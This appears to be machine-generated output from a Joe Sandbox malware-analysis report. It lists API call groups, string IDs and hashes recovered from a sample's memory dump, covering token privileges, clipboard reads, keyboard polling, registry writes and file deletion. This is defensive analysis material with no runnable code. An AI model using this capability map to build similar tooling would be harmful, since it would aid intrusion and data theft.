                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 4125248594-2988720461
                                                                  • Opcode ID: b75eeb7890f92db59c3240eefc4350e8f6a5c3a7d02219fcf50f2d7009d70020
                                                                  • Instruction ID: a94e0cf93114bec410c174d3a38c9ef0593734e704344d7c2babad03907ccac7
                                                                  • Opcode Fuzzy Hash: b75eeb7890f92db59c3240eefc4350e8f6a5c3a7d02219fcf50f2d7009d70020
                                                                  • Instruction Fuzzy Hash: 5C315271A4031CBAEB206BA19C49F7F3E6CEB44B60F244016FA05AA1D1CAF15D50BEA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00F29399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F293E3
                                                                    • Part of subcall function 00F29399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F29410
                                                                    • Part of subcall function 00F29399: GetLastError.KERNEL32 ref: 00F2941D
                                                                  • _memset.LIBCMT ref: 00F28F71
                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00F28FC3
                                                                  • CloseHandle.KERNEL32(?), ref: 00F28FD4
                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F28FEB
                                                                  • GetProcessWindowStation.USER32 ref: 00F29004
                                                                  • SetProcessWindowStation.USER32(00000000), ref: 00F2900E
                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F29028
                                                                    • Part of subcall function 00F28DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F28F27), ref: 00F28DFE
                                                                    • Part of subcall function 00F28DE9: CloseHandle.KERNEL32(?,?,00F28F27), ref: 00F28E10
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                  • String ID: $default$winsta0
                                                                  • API String ID: 2063423040-1027155976
                                                                  • Opcode ID: 43038ba5e0a0c1daf330b9c8c98953887d0d5ddf714a8c5aa650ced37be95ae5
                                                                  • Instruction ID: c67bd6efddacac85808b70e6441b77bb951a3f6df39052ea6a1d6a485ecefdcd
                                                                  • Opcode Fuzzy Hash: 43038ba5e0a0c1daf330b9c8c98953887d0d5ddf714a8c5aa650ced37be95ae5
                                                                  • Instruction Fuzzy Hash: 58817B71C0421DBFDF119FA0EC49AEE7B79EF04314F144119F920A7261DBB28E25AB20
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • OpenClipboard.USER32(00F60980), ref: 00F4465C
                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00F4466A
                                                                  • GetClipboardData.USER32 ref: 00F44672
                                                                  • CloseClipboard.USER32 ref: 00F4467E
                                                                  • GlobalLock.KERNEL32 ref: 00F4469A
                                                                  • CloseClipboard.USER32 ref: 00F446A4
                                                                  • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00F446B9
                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00F446C6
                                                                  • GetClipboardData.USER32 ref: 00F446CE
                                                                  • GlobalLock.KERNEL32 ref: 00F446DB
                                                                  • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00F4470F
                                                                  • CloseClipboard.USER32(00000001,00000000), ref: 00F4481F
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                  • String ID:
                                                                  • API String ID: 3222323430-0
                                                                  • Opcode ID: 6decb318659eebf96800427e75263d1af047daaa5641d66eea9149dbe3439180
                                                                  • Instruction ID: dfb773d83602b4e91a6a43bf70f6abdae78e8dbda3436c39ae3f8385b4b75fb0
                                                                  • Opcode Fuzzy Hash: 6decb318659eebf96800427e75263d1af047daaa5641d66eea9149dbe3439180
                                                                  • Instruction Fuzzy Hash: 9E51B5712042496BD300EF60DC59F6FB7A8AF84B50F10052DF966E21E1DF70E905AB62
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00F3CDD0
                                                                  • FindClose.KERNEL32(00000000), ref: 00F3CE24
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F3CE49
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F3CE60
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F3CE87
                                                                  • __swprintf.LIBCMT ref: 00F3CED3
                                                                  • __swprintf.LIBCMT ref: 00F3CF16
                                                                    • Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77
                                                                  • __swprintf.LIBCMT ref: 00F3CF6A
                                                                    • Part of subcall function 00EF38C8: __woutput_l.LIBCMT ref: 00EF3921
                                                                  • __swprintf.LIBCMT ref: 00F3CFB8
                                                                    • Part of subcall function 00EF38C8: __flsbuf.LIBCMT ref: 00EF3943
                                                                    • Part of subcall function 00EF38C8: __flsbuf.LIBCMT ref: 00EF395B
                                                                  • __swprintf.LIBCMT ref: 00F3D007
                                                                  • __swprintf.LIBCMT ref: 00F3D056
                                                                  • __swprintf.LIBCMT ref: 00F3D0A5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                  • API String ID: 3953360268-2428617273
                                                                  • Opcode ID: 56f36e41150a7df8a4e9df7b9d79a6c24507dd0e6b7f6170910b66851327133c
                                                                  • Instruction ID: 68b7d6bd2d7ec093a374fedff2af379a74126f3cc555d910383823a4b5a462dc
                                                                  • Opcode Fuzzy Hash: 56f36e41150a7df8a4e9df7b9d79a6c24507dd0e6b7f6170910b66851327133c
                                                                  • Instruction Fuzzy Hash: 5EA15CB1404344ABC714EFA4C885DAFB7ECEF94700F40191AF595E3291EB34EA49CB62
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,74CB61D0,?,00000000), ref: 00F3F5F9
                                                                  • _wcscmp.LIBCMT ref: 00F3F60E
                                                                  • _wcscmp.LIBCMT ref: 00F3F625
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00F3F637
                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00F3F651
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00F3F669
                                                                  • FindClose.KERNEL32(00000000), ref: 00F3F674
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00F3F690
                                                                  • _wcscmp.LIBCMT ref: 00F3F6B7
                                                                  • _wcscmp.LIBCMT ref: 00F3F6CE
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3F6E0
                                                                  • SetCurrentDirectoryW.KERNEL32(00F8B578), ref: 00F3F6FE
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F3F708
                                                                  • FindClose.KERNEL32(00000000), ref: 00F3F715
                                                                  • FindClose.KERNEL32(00000000), ref: 00F3F727
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                  • String ID: *.*
                                                                  • API String ID: 1803514871-438819550
                                                                  • Opcode ID: 410801ec433b2c3e006448a597481dd47b5e837aa9c1dc830ca0a04e426e0e2b
                                                                  • Instruction ID: 6d5353e0be1d0371b63dbff606ae3e96143efbfa6e2be3bc09c6b0358e0ff21a
                                                                  • Opcode Fuzzy Hash: 410801ec433b2c3e006448a597481dd47b5e837aa9c1dc830ca0a04e426e0e2b
                                                                  • Instruction Fuzzy Hash: DD31C371E4021D6ADB10AFB4DC59AEF77ACAF09331F240165F915E31A0DF70DA48EA64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F50FB3
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F60980,00000000,?,00000000,?,?), ref: 00F51021
                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F51069
                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F510F2
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00F51412
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F5141F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                  • API String ID: 536824911-966354055
                                                                  • Opcode ID: 1bfe8799cc5d0d09c2922b7e2f3ce325225118e365ab902b9df270baa64e704d
                                                                  • Instruction ID: b6300f46f851de4de174bc770f3d41e28a9c8aeb0e6042a92995a712aef4ebe1
                                                                  • Opcode Fuzzy Hash: 1bfe8799cc5d0d09c2922b7e2f3ce325225118e365ab902b9df270baa64e704d
                                                                  • Instruction Fuzzy Hash: 38027A716006019FCB14EF25C845E2AB7E5FF89720F04895DF95AAB3A2CB30EC45DB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,74CB61D0,?,00000000), ref: 00F3F756
                                                                  • _wcscmp.LIBCMT ref: 00F3F76B
                                                                  • _wcscmp.LIBCMT ref: 00F3F782
                                                                    • Part of subcall function 00F34875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F34890
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00F3F7B1
                                                                  • FindClose.KERNEL32(00000000), ref: 00F3F7BC
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00F3F7D8
                                                                  • _wcscmp.LIBCMT ref: 00F3F7FF
                                                                  • _wcscmp.LIBCMT ref: 00F3F816
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3F828
                                                                  • SetCurrentDirectoryW.KERNEL32(00F8B578), ref: 00F3F846
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F3F850
                                                                  • FindClose.KERNEL32(00000000), ref: 00F3F85D
                                                                  • FindClose.KERNEL32(00000000), ref: 00F3F86F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                  • String ID: *.*
                                                                  • API String ID: 1824444939-438819550
                                                                  • Opcode ID: 6949187e9bab91ea5eeec7540add62d4f5b235b3619eef206b54abd6d66625d0
                                                                  • Instruction ID: bbaed91d0ab2f8a1eb2b3da2c809ca46e4100b9d6adc049b35c60a3aee668ce7
                                                                  • Opcode Fuzzy Hash: 6949187e9bab91ea5eeec7540add62d4f5b235b3619eef206b54abd6d66625d0
                                                                  • Instruction Fuzzy Hash: 3E31D472D4021EAADB14AFB4DC48AEF77AC9F09330F240165E914A21A1DB70DE49AB64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00F28E20: GetUserObjectSecurity.USER32 ref: 00F28E3C
                                                                    • Part of subcall function 00F28E20: GetLastError.KERNEL32(?,00F28900,?,?,?), ref: 00F28E46
                                                                    • Part of subcall function 00F28E20: GetProcessHeap.KERNEL32(00000008,?,?,00F28900,?,?,?), ref: 00F28E55
                                                                    • Part of subcall function 00F28E20: HeapAlloc.KERNEL32(00000000,?,00F28900,?,?,?), ref: 00F28E5C
                                                                    • Part of subcall function 00F28E20: GetUserObjectSecurity.USER32 ref: 00F28E73
                                                                    • Part of subcall function 00F28EBD: GetProcessHeap.KERNEL32(00000008,00F28916,00000000,00000000,?,00F28916,?), ref: 00F28EC9
                                                                    • Part of subcall function 00F28EBD: HeapAlloc.KERNEL32(00000000,?,00F28916,?), ref: 00F28ED0
                                                                    • Part of subcall function 00F28EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F28916,?), ref: 00F28EE1
                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F28931
                                                                  • _memset.LIBCMT ref: 00F28946
                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F28965
                                                                  • GetLengthSid.ADVAPI32(?), ref: 00F28976
                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00F289B3
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F289CF
                                                                  • GetLengthSid.ADVAPI32(?), ref: 00F289EC
                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F289FB
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00F28A02
                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F28A23
                                                                  • CopySid.ADVAPI32(00000000), ref: 00F28A2A
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F28A5B
                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F28A81
                                                                  • SetUserObjectSecurity.USER32 ref: 00F28A95
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                  • String ID:
                                                                  • API String ID: 3996160137-0
                                                                  • Opcode ID: 4abc2144b49778a5562d9d5240c6e8015f1b24ad7802335cf9dc105a81314800
                                                                  • Instruction ID: 6962407765215d6d2f7c4d5fa366a781ef4865c50dc4583d88467f14e9c47f51
                                                                  • Opcode Fuzzy Hash: 4abc2144b49778a5562d9d5240c6e8015f1b24ad7802335cf9dc105a81314800
                                                                  • Instruction Fuzzy Hash: 16615A71901119FFDF00DFA1EC45AAEBB79FF04350F14811AE825AA290DF759A06EB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00F5147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F5040D,?,?), ref: 00F51491
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F50B0C
                                                                    • Part of subcall function 00ED4D37: __itow.LIBCMT ref: 00ED4D62
                                                                    • Part of subcall function 00ED4D37: __swprintf.LIBCMT ref: 00ED4DAC
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F50BAB
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F50C43
                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F50E82
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F50E8F
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 1240663315-0
                                                                  • Opcode ID: 635f582339e2133981ee42d209fffd1818d2953a288da2217ea297a684d2f6f8
                                                                  • Instruction ID: b96da9ddad910240bddf021c311a446104a049027efb9adf8b1d7b9294ea8c30
                                                                  • Opcode Fuzzy Hash: 635f582339e2133981ee42d209fffd1818d2953a288da2217ea297a684d2f6f8
                                                                  • Instruction Fuzzy Hash: 3BE19B71604214AFCB14DF28C895E2BBBE9EF89314F14896DF94ADB2A1DB30EC05DB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 00F30530
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00F305B1
                                                                  • GetKeyState.USER32 ref: 00F305CC
                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00F305E6
                                                                  • GetKeyState.USER32 ref: 00F305FB
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00F30613
                                                                  • GetKeyState.USER32 ref: 00F30625
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00F3063D
                                                                  • GetKeyState.USER32 ref: 00F3064F
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00F30667
                                                                  • GetKeyState.USER32 ref: 00F30679
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: d460cb7aef3022fb3ecb375622db306db8284f3f166148a2ddccec6f18fd6cb3
                                                                  • Instruction ID: f943ef0146ce4021449bd2b18099f33ba04d3a16f181611356d28ead7c02368f
                                                                  • Opcode Fuzzy Hash: d460cb7aef3022fb3ecb375622db306db8284f3f166148a2ddccec6f18fd6cb3
                                                                  • Instruction Fuzzy Hash: 9341B320D047CA6DFF718A6488257B6BEA06B51334F0C405BD5C6475C2EFE499D8EFA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __swprintf.LIBCMT ref: 00F34451
                                                                  • __swprintf.LIBCMT ref: 00F3445E
                                                                    • Part of subcall function 00EF38C8: __woutput_l.LIBCMT ref: 00EF3921
                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 00F34488
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00F34494
                                                                  • LockResource.KERNEL32(00000000), ref: 00F344A1
                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 00F344C1
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00F344D3
                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00F344E2
                                                                  • LockResource.KERNEL32(?), ref: 00F344EE
                                                                  • CreateIconFromResourceEx.USER32 ref: 00F3454F
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                  • String ID:
                                                                  • API String ID: 1433390588-0
                                                                  • Opcode ID: f09294e2108e99a1c400675ec498e412a2951b31df758e61005a5fac23b8c8b1
                                                                  • Instruction ID: 63867d61963d25117768fe66792b72fd773d16efbc5b01a3dc0455afd88dab83
                                                                  • Opcode Fuzzy Hash: f09294e2108e99a1c400675ec498e412a2951b31df758e61005a5fac23b8c8b1
                                                                  • Instruction Fuzzy Hash: AC31CF7190121EABCB159F60EC58ABF7BA8EF04360F184465F926D2150DB74FA11EBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EF0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE2A58,?,00008000), ref: 00EF02A4
                                                                    • Part of subcall function 00F34FEC: GetFileAttributesW.KERNEL32(?,00F33BFE), ref: 00F34FED
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00F33D96
                                                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00F33E3E
                                                                  • MoveFileW.KERNEL32(?,?), ref: 00F33E51
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00F33E6E
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F33E90
                                                                  • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00F33EAC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                  • String ID: \*.*
                                                                  • API String ID: 4002782344-1173974218
                                                                  • Opcode ID: f2acff18431dae63e6e5915a49e779a90a0c1566658f730576e993b6f1363b99
                                                                  • Instruction ID: 21d1d0e65cb5551e4dad5ad1e506ea1dc9f8257d0a4deab833e18ced75f12b9f
                                                                  • Opcode Fuzzy Hash: f2acff18431dae63e6e5915a49e779a90a0c1566658f730576e993b6f1363b99
                                                                  • Instruction Fuzzy Hash: 5C516E3180114DAACF15EBA1CD929EDB7B9AF14311F2001A9E452B7192EF356F8DEB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77
                                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00F3FA83
                                                                  • FindClose.KERNEL32(00000000), ref: 00F3FB96
                                                                    • Part of subcall function 00ED52B0: PeekMessageW.USER32 ref: 00ED52E6
                                                                  • Sleep.KERNEL32(0000000A), ref: 00F3FAB3
